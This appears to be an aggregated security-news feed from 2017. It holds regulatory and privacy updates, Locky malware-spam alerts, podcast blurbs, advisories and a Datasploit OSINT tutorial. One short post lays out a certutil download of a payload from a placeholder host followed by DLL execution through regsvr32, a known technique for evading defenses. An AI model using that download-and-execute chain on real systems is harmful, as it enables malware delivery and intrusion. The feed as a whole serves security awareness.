The NIAC Report calls on the Trump Administration to take “bold, decisive actions” to improve critical infrastructure cybersecurity, including (1) establishing separate and secure communications networks for critical cyber networks; (2) facilitating a private-sector-led pilot of machine-to-machine information sharing technologies; (3) identifying best-in-class scanning tools and assessment practices; (4) strengthening the cyber workforce; (5) establishing outcome-based market incentives to encourage upgrades to cyber infrastructure; (6) streamlining security clearance processes for owners of critical cyber assets; (7) establishing protocols to rapidly declassify and proactively share cyber threat information; (8) creating a private-public task force of cyber experts; (9) leveraging GridEx IV Exercises to test cyber incident response; and (10) establishing an optimum cybersecurity governance approach.

The NIAC Report further recommends that the National Security Advisor be tasked with reviewing the report and, within 6 months, recommend immediate steps forward. Relatedly, President Trump’s recent E.O. 13800 directs the government to engage with such critical infrastructure to identify authorities and capabilities that agencies could employ to support the cybersecurity efforts of critical infrastructure entities, and issue a report to the President by November 2017.

Cyber Chef

Nice site at https://gchq.github.io/CyberChef/ - Allows you to do all sorts of conversions of data format, generate encoding and encryption, parse network data, extract strings, IPs, email addresses, etc., analyze hashes and a lot more.

APEC and EU Discuss Interoperability Between Data Transfer Mechanisms

On August 24, 2017, APEC issued a statement on the renewed talks between APEC and the EU on creating interoperability between the APEC Cross-Border Privacy Rules (“CBPR”) and the EU data transfer mechanisms.

The APEC Data Privacy Subgroup (“DPS”) met with a representative of the European Commission on August 22, 2017 in Ho Chi Minh City, Vietnam, as part of the bi-annual meetings of the APEC DPS to discuss possible next steps in creating interoperability, particularly in light of the EU General Data Protection Regulation (“GDPR”) and its transfer mechanisms, including GDPR certifications and codes of conduct.

The August 22 meeting picked up where an earlier working group between the DPS and the EU’s Article 29 Working Party left off three years ago after it had developed a document (the “Referential”) comparing the requirements of the CBPR and the EU Binding Corporate Rules and taken initial steps to develop ways to streamline dual certifications under both systems. The aim of the meeting in Vietnam earlier this week was to explore ways to continue this work in light of the opportunities presented by the GDPR and the increasing interest among governments, regulators and industry in this work. The revived APEC/EU working group agreed to continue their discussions intersessionally between now and the next round of APEC privacy meetings in Papua New Guinea in early February 2018.

The EU Commission representative also attended the other meetings of the APEC DPS, where the principal focus remained on the ongoing implementation of the APEC CBPR system across the Asia-Pacific region, and on efforts to further enhance the infrastructure and governance framework needed to accommodate the growing number of APEC economies that are joining the CBPR system.

Mitmproxy Google Summer of Code 17 Summary

Hi, I’m Matthew Shao from China. This year, I got the honor to be selected as a Google Summer of Code student for the mitmproxy project. With the help of my kindly mentors Maximilian Hils and Clemens Brunner, I managed to improve the source code of mitmweb, which is a web interface for mitmproxy, and added some exciting new features for it. Here I’m going to present you the work I’ve done during this fulfilling summer.

read more

Malware spam: "Voicemail Service" / "New voice message.."

The jumble of numbers in this spam is a bit confusing. Attached is a malicious RAR file that leads to Locky ransomware. Subject:       New voice message 18538124076 in mailbox 185381240761 from "18538124076" <6641063681>From:       "Voicemail Service" [vmservice@victimdomain.tdl]Date:       Fri, August 25, 2017 12:36 pmDear user:just wanted to let you know you were just left a 0:13 long

Mentoring: On Blogging

Received the question about blogging. More specifically:
  • How and Why
  • How to benefit from blogging
  • How to be consistent with posting
In my mind, the key to success and blogging is to be totally selfish in its planning and execution.

Blogging is a personal activity/journey that you allow the public to be a part of.  What I mean by this is that the main audience for your blog should be YOU.  My blog is a place where I take notes and occasionally try to talk about a more touchy-feely topics or issues. These notes are notes that I'm ok with sharing publicly. I also keep a private blog  (but really more notes/cheat-sheet think RTFM...I use MDwiki) because you don't need to give everyone all your tricks and secrets.   If you show up for a new job and everyone knows your tricks because you've shared them publicly (because you need attention from strangers) what value are you bringing to your employer?

The benefit to blogging is note taking. I'm a HUGE proponent of taking notes and I'd chalk a lot of my success up to taking copious notes.  When I figure out how to mess with technology X, I take notes on it. As a consultant, it may be months or years before I see it again.  Having notes to go back to saves time and stress.  It also allows me to help people on my team in the event they run into it while I am on a different project.

How/Platforms:  I use Blogger because I don't want to secure/worry about my blogging platform. This blog was on Drupal for a bit and some jerk person decided to make an example of the blog's lack of updates publicly at BlackHat (appreciate the heads up...#totallynotbitter).  With Blogger, hosted WordPress, or some other hosted platform I'm offloading the risk and I don't have to worry about keeping up with patches.  

Consistently posting. No idea. It's clear I have lost the ability to consistently post. I do sometimes queue up a bunch of posts and schedule their posting.  I've found it was easier to find things to blog about when I was consulting since I had a different client every week so it would be difficult to tie a vulnerability back to any particular client.  Now that I work for a company, if I'm talking about some vulnerability or exploit I used there is a good chance I used it for work; potentially exposing the company to risk.

Length.  No one reads long posts.  Break long posts into separate logical posts even if you choose to post them at the same time.


Also see the "On Social Media" post (Todo)

Also
https://www.j4vv4d.com/a-blog-about-blogging-with-bloggers/

Also see this timely tweet by Robin Wood
https://twitter.com/digininja/status/900340713669279745

Malware spam: "Your Sage subscription invoice is ready" / noreply@sagetop.com

This fake Sage invoice leads to Locky ransomware. Quite why Sage are picked on so much by the bad guys is a bit of a mystery. Subject:       Your Sage subscription invoice is readyFrom:       "noreply@sagetop.com" [noreply@sagetop.com]Date:       Thu, August 24, 2017 8:49 pmDear CustomerYour Sage subscription invoice is now ready to view.Sage subscriptions To view your Sage subscription

SEC Risk Alert Highlights Cybersecurity Improvements and Suggested Best Practices

On August 7, 2017, the Securities and Exchange Commission (“SEC”) Office of Compliance Inspections and Examinations (“OCIE”) issued a Risk Alert examining the cybersecurity policies and procedures of 75 broker-dealers, investment advisers and investment companies (collectively, the “firms”). The Risk Alert builds on OCIE’s 2014 Cybersecurity Initiative, a prior cybersecurity examination of the firms, and notes that while OCIE “observed increased cybersecurity preparedness” among the firms since 2014, it “also observed areas where compliance and oversight could be improved.”

Key improvements observed included:

  • use of periodic risk assessments, penetration tests and vulnerability scans of critical systems to identify cybersecurity threats and vulnerabilities, as well as potential business consequences of a cybersecurity incident;
  • procedures for regular system maintenance, including software patching, to address security updates;
  • implementation of written policies and procedures, including response plans and defined roles and responsibilities, for addressing cybersecurity incidents; and
  • vendor risk assessments conducted at the outset of an engagement with a vendor and often updated periodically throughout the business relationship.

Key issues observed included:

  • failure to reasonably tailor written policies and procedures (e.g., many policies and procedures were written vaguely or broadly, with limited examples of safeguards and limited procedures for policy implementation);
  • failure to adhere to or enforce written policies and procedures, or failure to ensure that such policies and procedures reflected firms’ actual practices;
  • failure to timely remediate high-risk findings of penetration tests and vulnerability scans; and
  • use of outdated operating systems that no were longer supported by security patches.

In addition, the Risk Alert included a list of best practices identified by OCIE as elements of robust cybersecurity programs. These included maintaining:

  • an inventory of data, information and vendors;
  • instructions for various aspects of cybersecurity protocols, including security monitoring, auditing and testing, as well as incident reporting;
  • schedules and processes for cybersecurity testing; and
  • “established and enforced” access controls to data and systems.

OCIE further noted that robust cybersecurity programs may include mandatory employee training and vetting and approval of policies and procedures by senior management. OCIE indicated in the Risk Alert that its list of cybersecurity program best practices is not intended to be exhaustive.

OCIE noted that it will continue to prioritize cybersecurity compliance and will examine firms’ procedures and controls, “including testing the implementation of those procedures and controls at firms.”

Multiple badness on metoristrontgui.info / 119.28.100.249

Two massive fake "Bill" spam runs seem to be under way, one claiming to be from BT and the other being more generic. Subject:       New BT BillFrom:       "BT Business" [btbusiness@bttconnect.com]Date:       Thu, August 24, 2017 6:08 pmPriority:       NormalFrom BTNew BT BillYour bill amount is: $106.84This doesn't include any amounts brought forward from any other bills.We've put your latest

Enterprise Security Weekly #58 – A Game Changer

Paul and John discuss developer awareness, security training, and vulnerability tracking and reporting. In the news, diving deep into threat intelligence, GeoGuard and Skyhook team up, securing mobile devices, and more on this episode of Enterprise Security Weekly!Full Show Notes: https://wiki.securityweekly.com/ES_Episode58Visit https://www.securityweekly.com for all the latest episodes!

Malware spam: "Customer Service" / "Copy of Invoice xxxx"

This fairly generic spam leads to the Locky ransomware: Subject:       Copy of Invoice 3206From:       "Customer Service" Date:       Wed, August 23, 2017 9:12 pmPlease download file containing your order information.If you have any further questions regarding your invoice, please call Customer Service.Please do not reply directly to this automatically generated e-mail message.Thank

MS16-149 – Important: Security Update for Microsoft Windows (3205655) – Version: 1.1

Severity Rating: Important
Revision Note: V1.1 (August 23, 2017): Corrected the Updates Replaced for security update 3196726 to None. This is an informational change only. Customers who have already successfully installed the update do not need to take any further action.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow elevation of privilege if a locally authenticated attacker runs a specially crafted application.

Malware spam: "Voice Message Attached from 0xxxxxxxxxxx – name unavailable"

This fake voice mail message leads to malware. It comes in two slightly different versions, one with a RAR file download and the other with a ZIP. Subject:       Voice Message Attached from 001396445685 - name unavailable From:       "Voice Message" Date:       Wed, August 23, 2017 10:22 am Time: Wed, 23 Aug 2017 14:52:12 +0530 Download

Hack Naked News #137 – August 22, 2017

Zero-days in PDF readers, updates to Debain Stretch, killer robots are coming, and more. Jason Wood of Paladin Security discusses sexually charged sonar-based attacks on this episode of Hack Naked News!Full Show Notes: https://wiki.securityweekly.com/HNNEpisode137Visit https://www.securityweekly.com for all the latest episodes!

Malware spam from "Voicemail Service" [pbx@local]

This fake voicemail leads to malware: Subject:       [PBX]: New message 46 in mailbox 461 from "460GOFEDEX" <8476446077> From:       "Voicemail Service" [pbx@local] Date:       Tue, August 22, 2017 10:37 am To:       "Evelyn Medina" Priority:       Normal Dear user:         just wanted to let you know you were just left a 0:53 long message (number 46) in mailbox 461 from "460GOFEDEX" <

Delaware Amends Data Breach Notification Law

As reported in BNA Privacy Law Watch, on August 17, 2017, Delaware amended its data breach notification law, effective April 14, 2018. The Delaware law previously required companies to give notice of a breach to affected Delaware residents “as soon as possible” after determining that, as a result of the breach, “misuse of information about a Delaware resident has occurred or is reasonably likely to occur.” The prior version of the law did not require regulator notification.

The amendments include several key provisions:

  • Definition of Personal Information. Under the revised law, the definition of “personal information” is expanded and now includes a Delaware resident’s first name or first initial and last name in combination with any one or more of the following data elements: (1) Social Security number; (2) driver’s license or state or federal identification card number; (3) account number, credit card number or debit card number in combination with any required security code, access code or password that would permit access to a financial account; (4) passport number; (5) a username or email address in combination with a password or security question and answer that would permit access to an online account; (6) medical history, treatment or diagnosis by a health care professional, or DNA profile; (7) health insurance identification number; (8) biometric data; and (9) an individual taxpayer identification number.
  • Timing. Companies will be required to notify affected individuals of a data breach within 60 days.
  • Notice to the Attorney General. Companies will be required to notify the Delaware Attorney General if a breach affects more than 500 Delaware residents.
  • Harm Threshold. The amendments change the law’s harm threshold for notification. Under the revised law, notification to affected individuals (and the Attorney General, if applicable) is required unless, after an appropriate investigation, the company reasonably determines that the breach is unlikely to result in harm to affected individuals.
  • Credit Monitoring. Companies will be required to offer credit monitoring services to affected individuals at no cost for one year if the breach includes a Delaware resident’s Social Security number. California’s breach notification law contains a similar requirement.

Uber Settles FTC Data Privacy and Security Allegations

On August 15, 2017, the FTC announced that it had reached a settlement with Uber, Inc., over allegations that the ride-sharing company had made deceptive data privacy and security representations to its consumers. Under the terms of the settlement, Uber has agreed to implement a comprehensive privacy program and undergo regular, independent privacy audits for the next 20 years.

The FTC’s complaint alleged that Uber made false or misleading representations that the company (1) appropriately controlled employee access to consumers’ personal information and (2) provided reasonable security for consumers’ personal information.

Employee Access to Consumers’ Personal Information

The complaint cited news reports from November 2014 that accused Uber employees of improperly accessing and using consumer personal information, including the use of an internal tracking tool called “God View,” which allowed employees to access the geolocation of individual Uber riders in real time. In its response to these allegations, Uber represented that the company had a “strict policy prohibiting all employees at every level from accessing a rider or driver’s data” except for a “limited set of legitimate business purposes.” Uber also stated that employee access to riders’ personal information was “closely monitored and audited by data security specialists on an ongoing basis.” The FTC alleged that (1) these statements were false or misleading, (2) Uber failed to implement a system that effectively and continuously monitored employee access, and (3) Uber did not respond in a timely fashion when alerted of the potential misuse of consumer personal information.

Data Security Representations

The complaint further alleged that Uber made the following false or misleading representations about the security of riders’ personal information:

  • From at least July 2013 to July 2015, Uber’s privacy policy represented that riders’ personal information was “securely stored within our databases” and that the company used “standard, industry-wide, commercially reasonable security practices such as encryption, firewalls and SSL…for protecting [rider] information.”
  • Uber customer service representatives assured riders that the company:
    • used “the most up to date technology and services” to protect personal information;
    • was “extra vigilant in protecting all private and personal information”; and
    • kept personal information “secure and encrypted to the highest security standards available.”

The FTC alleged that, in reality, Uber engaged in practices that failed to provide reasonable security to prevent unauthorized access to Uber riders’ and drivers’ personal information by, among other things:

  • failing to implement appropriate administrative access controls and multi-factor authentication on the company’s third-party databases that stored personal information;
  • failing to implement reasonable security training and guidance for employees;
  • failing to have a written information security program in place; and
  • storing sensitive personal information in a third-party storage database in clear, readable text, rather than encrypting the information.

The FTC alleged that these failures resulted in a May 2014 data breach of consumers’ personal information stored in a third-party database. The complaint alleged that the breach was caused by an intruder who used an access key that an Uber engineer had publicly posted to GitHub, a code-sharing website used by software developers.

Under the terms of the settlement agreement, Uber is:

  • prohibited from misrepresenting how it monitors internal access to consumers’ personal information;
  • prohibited from misrepresenting how it protects and secures that data;
  • required to implement a comprehensive privacy program that addresses privacy risks related to new and existing products and services, and protects the privacy and confidentiality of personal information collected by the company; and
  • required to obtain within 180 days of the settlement, and every two years after that for the next 20 years, independent, third-party audits certifying that it has a privacy program in place that meets or exceeds the requirements of the FTC order.

Uber’s settlement agreement underscores the importance of having accurate data privacy and security representations that are consistently followed by all company employees.

Certutil for delivery of files

Quick post putting together some twitter awesomeness

references:
https://twitter.com/subtee/status/888125678872399873
https://twitter.com/subTee/status/888071631528235010
https://twitter.com/malwaretechblog/status/733651527827623936

Let's do it

1. Create your DLL
2. Base64encode it (optional)
3. Use certutil.exe -urlcache -split -f http://example/file.txt file.blah to pull it down






4. Base64decode the file with certutil


5. Execute the dll with regsvr32 regsvr32 /s /u mydll.dll


Cerber spam: "please print", "images etc"

I only have a couple of samples of this spam, but I suspect it comes in many different flavours.. Subject:       imagesFrom:       "Sophia Passmore" [Sophia5555@victimdomain.tld]Date:       Fri, May 12, 2017 7:18 pm--*Sophia Passmore*Subject:       please printFrom:       "Roberta Pethick" [Roberta5555@victimdomain.tld]Date:       Fri, May 12, 2017 7:18 pm--*Roberta Pethick* In these two

IoT device guidelines

On several occasions I’ve written about insecurities of the Internet of Things – such as here, here, here, here and here. Recently, four US Senators decided to do something about it, and with the help of the Atlantic Council and Harvard University, have drafted a bill outlining minimum security requirements for IoT device purchases by …

FTC Posts Fifth Blog in Its “Stick with Security” Series

On August 18, 2017, the FTC published the fifth blog post in its “Stick with Security” series. As we previously reported, the FTC will publish an entry every Friday for the next few months focusing on each of the 10 principles outlined in its Start with Security Guide for Businesses. This week’s post, entitled Stick with Security: Store sensitive personal information securely and protect it during transmission, outlines steps businesses can take to secure sensitive data, including when it is in transit.

The FTC’s reasonable protections include:

  • Keeping Sensitive Information Secure Throughout its Lifecycle: This involves knowing how sensitive data enters the business, moves within it and leaves the business. Once a business understands this roadmap, it is easier to implement security at every interval of data movement.
  • Use Industry-Tested and Accepted Methods: To ensure security, businesses should adopt industry-tested methods reflective of expert wisdom in the field. For example, a business that adopts tried and true encryption methods accepted by industry, and incorporates these methods into product development, acts more prudently than a business that uses its own proprietary method to obfuscate data.
  • Ensure Proper Configuration: When businesses choose to use strong encryption, they need to ensure they have configured it correctly. For example, a business using Transport Layer Security (“TLS”) must ensure the process to validate the TLS certificate is enabled. Following default recommendations likely will result in the correct set up, but businesses that change settings must ensure that they have the correct configuration.

The FTC’s next blog post, to be published on Friday, August 25, will focus on segmenting networks and monitoring who is trying to get in and out.

To read our previous posts documenting the series, see FTC Posts Fourth Blog in its “Stick with Security” Series, FTC Posts Third Blog in its “Stick with Security” Series and FTC Posts Second Blog in its “Stick with Security” Series.

Google Begins Campaign Warning Forms Not Using HTTPS Protocol

August 2014, Google released an article sharing their thoughts on how they planned to focus on their “HTTPS everywhere” campaign (originally initiated at their Google I/O event). The premise of...

Read More

The post Google Begins Campaign Warning Forms Not Using HTTPS Protocol appeared first on PerezBox.

SEC Warns Initial Coin Offerings May Be Subject to U.S. Federal Securities Laws

In 2017, over $1.3 billion has been raised by start-ups through Initial Coin Offerings (“ICOs”), a relatively new form of financing technique in which a company (typically one operating in the digital currency space) seeking to raise seed money makes a “token” available for sale, and the token gives the purchaser some future right in the business or other benefit. Amidst much anticipation, on July 25, 2017, the Securities and Exchange Commission (“SEC”) released a Report of Investigation (“Report”) under Section 21(a) of the Securities Exchange Act of 1934 warning the market that “tokens” issued in ICOs may be “securities” such that the full breadth of the U.S. federal securities laws may apply to their offer and sale. The Report and a simultaneously released Investor Bulletin offer guidance and serve as a notice to the market that the SEC will be policing this new financing technique.

Read the full client alert.

Russian Privacy Regulator Adds Countries to List of Nations with Sufficient Privacy Protections

As reported in BNA Privacy & Security Law Report, on August 9, 2017, the Russian privacy regulator, Roskomnadzor, expanded its list of nations that provide sufficient privacy protections to allow transfers of personal data from Russia. Russian law allows data transfers to countries that are signatories to the Council of Europe’s Convention for the Protection of Individuals with regard to Automatic Processing of Personal Data (the “Convention”), and to certain other non-signatory countries deemed by Roskomnadzor to have adequate privacy protections based on relevant data protection laws, privacy regulators and penalties for privacy law violations.

The new authorized countries are Costa Rica, Gabon, Kazakhstan, Mali, Qatar, South Africa and Singapore. They join Angola, Argentina, Benin, Canada, Cape Verde, Chile, Israel, Malaysia, Mexico, Mongolia, Morocco, New Zealand, Peru, South Korea and Tunisia. The United States is neither a signatory to the Convention nor on Roskomnadzor’s list of countries with adequate privacy protections to permit personal data transfers from Russia.

Hack Naked News #136 – August 15, 2017

Allowing terrible passwords, four arrested in Game of Thrones leak, using EternalBlue to attack hotel guests, and more. Don Pezet of ITProTV joins us to deliver expert commentary on this episode of Hack Naked News!Full Show Notes: https://wiki.securityweekly.com/HNNEpisode136Visit https://www.securityweekly.com for all the latest episodes!

Toolsmith #127: OSINT with Datasploit

I was reading an interesting Motherboard article, Legal Hacking Tools Can Be Useful for Journalists, Too, that includes reference to one of my all time OSINT favorites, Maltego. Joseph Cox's article also mentions Datasploit, a 2016 favorite for fellow tools aficionado, Toolswatch.org, see 2016 Top Security Tools as Voted by ToolsWatch.org Readers. Having not yet explored Datasploit myself, this proved to be a grand case of "no time like the present."
Datasploit is "an #OSINT Framework to perform various recon techniques, aggregate all the raw data, and give data in multiple formats." More specifically, as stated on Datasploit documentation page under Why Datasploit, it utilizes various Open Source Intelligence (OSINT) tools and techniques found to be effective, and brings them together to correlate the raw data captured, providing the user relevant information about domains, email address, phone numbers, person data, etc. Datasploit is useful to collect relevant information about target in order to expand your attack and defense surface very quickly.
The feature list includes:
  • Automated OSINT on domain / email / username / phone for relevant information from different sources
  • Useful for penetration testers, cyber investigators, defensive security professionals, etc.
  • Correlates and collaborate results, shows them in a consolidated manner
  • Tries to find out credentials,  API keys, tokens, sub-domains, domain history, legacy portals, and more as related to the target
  • Available as single consolidating tool as well as standalone scripts
  • Performs Active Scans on collected data
  • Generates HTML, JSON reports along with text files
Resources
Github: https://github.com/datasploit/datasploit
Documentation: http://datasploit.readthedocs.io/en/latest/
YouTube: Quick guide to installation and use

Pointers
Second, a few pointers to keep you from losing your mind. This project is very much work in progress, lots of very frustrated users filing bugs and wondering where the support is. The team is doing their best, be patient with them, but read through the Github issues to be sure any bugs you run into haven't already been addressed.
1) Datasploit does not error gracefully, it just crashes. This can be the result of unmet dependencies or even a missing API key. Do not despair, take note, I'll talk you through it.
2) I suggest, for ease, and best match to documentation, run Datasploit from an Ubuntu variant. Your best bet is to grab Kali, VM or dedicated and load it up there, as I did.
3) My installation guidance and recommendations should hopefully get you running trouble free, follow it explicitly.
4) Acquire as many API keys as possible, see further detail below.

Installation and preparation
From Kali bash prompt, in this order:

  1. git clone https://github.com/datasploit/datasploit /etc/datasploit
  2. apt-get install libxml2-dev libxslt-dev python-dev lib32z1-dev zlib1g-dev
  3. cd /etc/datasploit
  4. pip install -r requirements.txt
  5. mv config_sample.py config.py
  6. With your preferred editor, open config.py and add API keys for the following at a minimum, they are, for all intents and purposes required, detailed instructions to acquire each are here:
    1. Shodan API
    2. Censysio ID and Secret
    3. Clearbit API
    4. Emailhunter API
    5. Fullcontact API
    6. Google Custom Search Engine API key and CX ID
    7. Zoomeye Username and Password
If, and only if, you've done all of this correctly, you might end up with a running instance of Datasploit. :-) Seriously, this is some of the glitchiest software I've tussled with in quite a while, but the results paid handsomely. Run python datasploit.py domain.com, where domain.com is your target. Obviously, I ran python datasploit.py holisticinfosec.org to acquire results pertinent to your author. 
Datasploit rapidly pulled results as follows:
211 domain references from Github:
Github results
Luckily, no results from Shodan. :-)
Four results from Paste(s): 
Pastebin and Pastie results
Datasploit pulled russ at holisticinfosec dot org as expected, per email harvesting.
Accurate HolisticInfoSec host location data from Zoomeye:

Details regarding HolisticInfoSec sub-domains and page links:
Sub-domains and page links
Finally, a good return on DNS records for holisticinfosec.org and, thankfully, no vulns found via PunkSpider

DataSploit can also be integrated into other code and called as individual scripts for unique functions. I did a quick run with python emailOsint.py russ@holisticinfosec.org and the results were impressive:
Email OSINT
I love that the first query is of Troy Hunt's Have I Been Pwned. Not sure if you have been? Better check it out. Reminder here, you'll really want to be sure to have as many API keys as possible or you may find these buggy scripts crashing. You'll definitely find yourself compromising between frustration and the rapid, detailed results. I put this offering squarely in the "shows much promise category" if the devs keep focus on it, assess for quality, and handle errors better.
Give Datasploit a try for sure.
Cheers, until next time...

Detect and Prevent Data Exfiltration Webinar with Infoblox

Please join SANS Institute Instructor and LEO Cyber Security Co-Founder & CTO Andrew Hay and Infoblox Security Product Marketing’s Sam Kumarsamy on Thursday, August 17th, 2017 at 1:00 PM EDT (17:00:00 UTC) as they present a SANS Institute webinar entitled Detect & Prevent Data Exfiltration: A Unique Approach.

Overview

Data is the new currency in the modern digital enterprise and protecting data is a strategic imperative for every organization. Enterprises must protect data whether it resides in a data center, an individual’s laptop that is used on premise or off premise and across the global distributed enterprise. Effective data exfiltration prevention requires protecting DNS, the most commonly used channels to steal data and combining reputation, signatures and behavioral analytics. The detection and prevention of loss of data requires analysis of vast amounts of network data and require a solution that can scale to examine this data. In this webinar you will also learn about the Infoblox’s unique approach to detecting and preventing data exfiltration.

To register for the webinar, please visit: https://www.sans.org/webcasts/detect-prevent-data-exfiltration-unique-approach-infoblox-104985

You can now also attend the webcast using your mobile device!

 

The post Detect and Prevent Data Exfiltration Webinar with Infoblox appeared first on LEO Cyber Security.

Hunton Privacy Team Publishes Several Chapters in International Comparative Legal Guide to Data Protection

Recently, the fourth edition of the book, The International Comparative Legal Guide to: Data Protection 2017, was published by the Global Legal Group. Hunton & Williams’ Global Privacy and Cybersecurity lawyers prepared several chapters in the guide, including the opening chapter on “All Change for Data Protection: The European Data Protection Regulation,” co-authored by London partner Bridget Treacy and associate Anita Bapat. Several other global privacy and cybersecurity team members also prepared chapters in the guide, including David Dumont (Belgium), Claire François (France), Judy Li (China), Manuel E. Maisog (China), Wim Nauwelaerts (Belgium), Anna Pateraki (Germany), Aaron P. Simpson (United States), Adam Smith (United Kingdom) and Jenna Rode (United States).

The guide provides corporate counsel and international practitioners with a comprehensive worldwide legal analysis of the laws and regulations relating to data protection. Aaron Simpson, managing partner of the firm’s London office, and Anita Bapat, senior associate in London, served as the contributing editors of the guide.

View the relevant chapters.

Samsung Knox 1.0 Remote Code Execution Vulnerability

Samsung Knox is prone to a remote code-execution vulnerability.This allows a remote attacker to exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts may result in a denial-of-service condition.

The CERT Guide to Coordinated Vulnerability Disclosure

We are happy to announce the release of the CERT® Guide to Coordinated Vulnerability Disclosure (CVD). The guide provides an introduction to the key concepts, principles, and roles necessary to establish a successful CVD process. It also provides insights into how CVD can go awry and how to respond when it does so.

As a process, CVD is intended to minimize adversary advantage while an information security vulnerability is being mitigated. And it is important to recognize that CVD is a process, not an event. Releasing a patch or publishing a document are important events within the process, but do not define it.

CVD participants can be thought of as repeatedly asking these questions: What actions should I take in response to knowledge of this vulnerability in this product? Who else needs to know what, and when do they need to know it? The CVD process for a vulnerability ends when the answers to these questions are nothing, and no one.

If we have learned anything in nearly three decades of coordinating vulnerability reports at the CERT/CC, it is that there is no single right answer to many of the questions and controversies surrounding the disclosure of information about software and system vulnerabilities. The CERT Guide to CVD is a summary of what we know about a complex social process that surrounds humans trying to make the software and systems they use more secure. It's about what to do (and what not to) when you find a vulnerability, or when you find out about a vulnerability. It's written for vulnerability analysts, security researchers, developers, and deployers; it's for both technical staff and their management alike. While we discuss a variety of roles that play a part in the process, we intentionally chose not to focus on any one role; instead we wrote for any party that might find itself engaged in coordinating a vulnerability disclosure.

In a sense, this report is a travel guide for what might seem a foreign territory. Maybe you've passed through once or twice. Maybe you've only heard about the bad parts. You may be uncertain of what to do next, nervous about making a mistake, or even fearful of what might befall you. If you count yourself as one of those individuals, we want to reassure you that you are not alone; you are not the first to experience events like these or even your reaction to them. We're locals. We've been doing this for a while. Here's what we know.

Abstract

Security vulnerabilities remain a problem for vendors and deployers of software-based systems alike. Vendors play a key role by providing fixes for vulnerabilities, but they have no monopoly on the ability to discover vulnerabilities in their products and services. Knowledge of those vulnerabilities can increase adversarial advantage if deployers are left without recourse to remediate the risks they pose. Coordinated Vulnerability Disclosure (CVD) is the process of gathering information from vulnerability finders, coordinating the sharing of that information between relevant stakeholders, and disclosing the existence of software vulnerabilities and their mitigations to various stakeholders including the public. The CERT Coordination Center has been coordinating the disclosure of software vulnerabilities since its inception in 1988. This document is intended to serve as a guide to those who want to initiate, develop, or improve their own CVD capability. In it, the reader will find an overview of key principles underlying the CVD process, a survey of CVD stakeholders and their roles, and a description of CVD process phases, as well as advice concerning operational considerations and problems that may arise in the provision of CVD and related services.

The CERT® Guide to Coordinated Vulnerability Disclosure is available in the SEI Digital Library.

Colombia Designates U.S. as “Adequate” Data Transfer Nation

On August 14, 2017, the Colombian Superintendence of Industry and Commerce (“SIC”) announced that it was adding the United States to its list of nations that provide an adequate level of protection for the transfer of personal information, according to a report from Bloomberg BNA. The SIC, along with the Superintendence of Finance, is Colombia’s data protection authority, and is responsible for enforcing Colombia’s data protection law. Under Colombian law, transfers of personal information to countries that are deemed to have laws providing an adequate level of protection are subject to less stringent restrictions (for example, prior consent for certain international transfers of personal information may not be required if a country’s protections are deemed adequate). This development should help facilitate the transfer of personal information from Colombia to the United States.

FTC Posts Fourth Blog in Its “Stick with Security” Series

On August 11, 2017, the FTC published the fourth blog post in its “Stick with Security” series. As we previously reported, the FTC will publish an entry every Friday for the next few months focusing on each of the 10 principles outlined in its Start with Security Guide for Businesses. This week’s post, entitled Stick with Security: Require secure passwords and authentication, examines five effective security measures companies can take to safeguard their computer networks.

The practical guidance aims to make it more difficult for hackers to gain unauthorized access to networks. These security measures include:

  • Insisting on long, complex and unique passwords. Companies should establish secure corporate password standards, implement minimum password requirements, and ensure employees are informed about how to create strong passwords. Obvious choices such as “ABCABC” or “qwerty” should be avoided and users should opt for longer passwords or passphrases when creating their login credentials. Passwords should be unique for each user and different passwords should be required for different applications. Additionally, default passwords should be changed immediately and when designing products that require consumers to use a password, they should be prompted to change the default upon set up.
  • Storing passwords securely. Even the strongest passwords are ineffective if not securely protected. Disclosing a password through phone calls or emails, sharing a password with others or writing a password down without properly storing or disposing of the record may lead to the password being compromised. Compromised passwords that lead to more sensitive data are particularly risky (e.g., a password which provides access to a database of other user credentials). To mitigate these risks, companies should implement policies and procedures to store credentials securely.
  • Guarding against brute force attacks. A brute force attack occurs where hackers use automated programs to systematically guess password combinations. For example, the program may attempt to log in with aaaa1, then aaaa2 and so on until it guesses the right combination. To avoid such attacks, companies should set up their systems to suspend or disable a user account after a certain number of unsuccessful login attempts.
  • Protecting sensitive accounts with more than just a password. For certain kinds of sensitive data, companies may need to take additional steps to protect against hacking. Consumers and employees often reuse usernames and passwords across accounts, and if placed into the wrong hands, this can result in credential stuffing attacks. Such attacks occur where stolen usernames and passwords are input on a large scale into popular internet sites to verify if they work. To protect against this kind of attack, companies should combine multiple authentication techniques for accounts with access to sensitive data. For example, companies should require verifications codes that are generated by voice call, text or security keys that need to be inserted into the USB port to grant access. Requiring employees to log into a virtual private network to gain access to systems provides an additional layer of protection.
  • Protecting against authentication bypass. Hackers who cannot gain access to a site through the main login page may try other methods, such as going directly to a network or application that is supposed to be accessible only after the user has signed on. To combat against this, companies should ensure that entry is allowed only through a secure authentication point and that there are no backdoors which hackers can target.

The FTC’s next blog post, to be published on Friday, August 18, will focus on securely storing sensitive personal information and protecting it during transmission.

To read our previous posts documenting the series, see FTC Posts Third Blog in its “Stick with Security” Series and FTC Posts Second Blog in its “Stick with Security” Series.

First Enforcement Actions Brought Pursuant to China’s Cybersecurity Law

In the wake of China’s Cybersecurity Law going into effect on June 1, 2017, local authorities in Shantou and Chongqing have brought enforcement actions against information technology companies for violations of the Cybersecurity Law. These are, reportedly, the first enforcement actions brought pursuant to the Cybersecurity Law.

Recently, Chongqing’s municipal Public Security Bureau’s cybersecurity team identified a violation of the Cybersecurity Law during a routine inspection. A technology development company failed, as required under the Cybersecurity Law, to retain web logs relating to its users’ logins when providing internet data center services. In response, the public security authority issued a warning and an order to correct the issue within 15 days, with a follow-up inspection to take place after the rectification. In another enforcement action taken by Shantou’s municipal Public Security Bureau’s cybersecurity team in July, an information technology company in Shantou, Guangdong Province, was ordered to correct a violation of the Cybersecurity Law.

Though reportedly the first enforcement actions brought pursuant to the new Cybersecurity Law, these amounted to only minor actions. They involved only warnings and orders to correct the issues; no fines or criminal penalties were imposed. Accordingly, these enforcement actions likely do not provide much insight into how the Cybersecurity Law will be enforced moving forward. These actions do, however, indicate that enforcement authorities, such as public security agencies and the cyberspace administration agency, have started to consider their roles in enforcing the Cybersecurity Law. More enforcement actions could be expected in future.

Cisco IOS 15.2(2)e3 Denial Of Service Obtain Information Vulnerability

